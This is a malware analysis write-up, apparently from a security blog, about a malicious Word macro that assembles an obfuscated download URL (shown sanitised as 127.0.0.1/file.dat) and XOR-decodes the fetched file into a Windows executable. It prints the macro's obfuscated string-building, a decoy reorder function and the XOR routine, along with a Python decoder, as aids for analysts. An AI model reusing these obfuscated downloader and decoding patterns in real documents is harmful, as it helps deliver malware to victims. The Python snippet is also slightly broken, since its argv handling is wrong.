If you're not sure what the document I am referring to looks like, here's a screenshot of what you should expect if you were to open it in Word or LibreOffice.
I've opted to not share the whole source code for the payload here but I am writing this as a primer for retrieving the data should you be interested in it. I've removed references to the keys and location of the payload but again this writeup should provide more than enough information.
It's pretty straightforward to decipher what the URL is so you can download the payload. It will look a lot like this when you do so:
As we can see, the URL is really "http://127.0.0.1/file.dat" so all one has to do is retrieve it normally and have the payload. This isn't new to this type of attack, but what is different here is that you'll need to look for an additional line to decode the file. An example of what we're looking for is here:IsDwQV = "httEeDxPbOZhstcWp://" dlBSaKVPUZeUffK = Replace(IsDwQV, "EeDxPbOZhstcW", "") vJPIYmKkzEidc = dlBSaKVPUZeUffK + "127.0.0.1/" + "file.da" + "t"
Again, just as straightforward as earlier, we just need to combine the second argument in this function to form the key "malwarekey".PTIEIYzefrUBrv.Write auRPAIQxRBuNVNs(ZlOton(AsWLAJsjgp), "mal" + "wa" + "rek" + "ey")
Now that we've gone and figured out the payload's URL and the key, we'll want to see how the payload is decoded. It goes through two processes: the first where reorders the contents of the file and the second where it performs a XOR on each byte.
The reordering function looks a lot like this (keep in mind, the variables and function names will change to avoid detection but the patterns will remain mostly the same):
The XOR function then will look like this:Function auRPAIQxRBuNVNs(gZZoRIEiqkagc, CIKkGOaWM) Dim vJPIYmKkzEidc vJPIYmKkzEidc = "" Dim yjiyoPGJqpm yjiyoPGJqpm = 2 - 1 Dim RpKxIaBse RpKxIaBse = 1 For RpKxIaBse = 1 To Len(gZZoRIEiqkagc) PhnHyZVCyES = Mid(CIKkGOaWM, yjiyoPGJqpm, 1) vJPIYmKkzEidc = vJPIYmKkzEidc & Chr(Asc(Mid(gZZoRIEiqkagc, RpKxIaBse, 1)) Xor Asc(PhnHyZVCyES)) yjiyoPGJqpm = yjiyoPGJqpm + 1 If Len(CIKkGOaWM) < yjiyoPGJqpm Then yjiyoPGJqpm = 1 Next auRPAIQxRBuNVNs = vJPIYmKkzEidc End Function
The reorder function is easy to clean up, so I've gone ahead and written it like so:Function ZlOton(ODkdfygTwl) Dim XvZDYBA, ZazVWW, SyyWJefcxs, eauVLHixkVU, cQdAHb, WGHeGPbgR Dim myjfHUNidfOgtQ XvZDYBA = 1 ZazVWW = (&H3EF + 2892 - &HF3A) SyyWJefcxs = (&H3EF + 2892 - &HF3A) myjfHUNidfOgtQ = LenB(ODkdfygTwl) Do While XvZDYBA <= myjfHUNidfOgtQ WGHeGPbgR = WGHeGPbgR & Chr(AscB(MidB(ODkdfygTwl, XvZDYBA, 1))) XvZDYBA = XvZDYBA + 1 SyyWJefcxs = SyyWJefcxs + 1 If SyyWJefcxs > 300 Then cQdAHb = cQdAHb & WGHeGPbgR WGHeGPbgR = "" SyyWJefcxs = (&H3EF + 2892 - &HF3A) ZazVWW = ZazVWW + 1 If ZazVWW > 40 * (&H20 + 1142 - &H491) Then eauVLHixkVU = eauVLHixkVU & cQdAHb cQdAHb = "" ZazVWW = 1 End If End If Loop ZlOton = eauVLHixkVU & cQdAHb & WGHeGPbgR End Function
Once we've cleaned this all up we can now determine that the function does absolutely nothing and is there to really obfuscate it further. The data that goes through this function comes out as the same, so it's really just a time-waster. However, the data is still encoded so I did go ahead and clean up the second function as so:Function reorder(filedata) Dim var1, var2, var3, var4, var5, var6 var1 = 1 var2 = 1 var3 = 1 Do While var1 <= LenB(filedata) var6 = var6 & Chr(AscB(MidB(filedata, var1, 1))) var1 = var1 + 1 var3 = var3 + 1 If var3 > 300 Then var5 = var5 & var6 var6 = "" var3 = 1 var2 = var2 + 1 If var2 > 200 Then var4 = var4 & var5 var5 = "" var2 = 1 End If End If Loop reorder = var4 & var5 & var6 End Function
Okay. So this code does in fact do something and now tells us that it's a straightforward XOR of the data. We can now just rewrite this script into Python line to line.Function decodexor(filedata, filekey) Dim var1 var1 = "" Dim var2 var2 = 2 - 1 Dim var3 var3 = 1 For var3 = 1 To Len(filedata) var4 = Mid(filekey, var2, 1) var1 = var1 & Chr(Asc(Mid(filedata, var3, 1)) Xor Asc(var4)) var2 = var2 + 1 If Len(filekey) < var2 Then var2 = 1 Next decodexor = var1 End Function
I've made it available via this Github Gist and per below:
You'll want to ignore the fact that this Python function is really a terrible mirror copy of the original, but works one-to-one like the original VBScript; there are of course better ways to write this.from sys import argv filename = argv malwarekey = argv def dexor(filedata, filekey): var1 = '' var2 = 0 var4 = '' for x in xrange(0, len(filedata)): var4 = filekey[var2] var1 = var1 + chr(ord(filedata[x]) ^ ord(var4)) var2 += 1 if var2 >= len(filekey): var2 = 0 return var1 if __name__ == '__main__': data = open(filename, 'rb').read() print dexor(filedata=data, filekey=malwarekey)
Once happy, we can run it like so:
Now we have the file decoded and can execute it within whatever sandbox we'd like!$ python dexor.py file.dat malwarekey > file.exe $ file file.exe file.exe: PE32 executable (GUI) Intel 80386, for MS Windows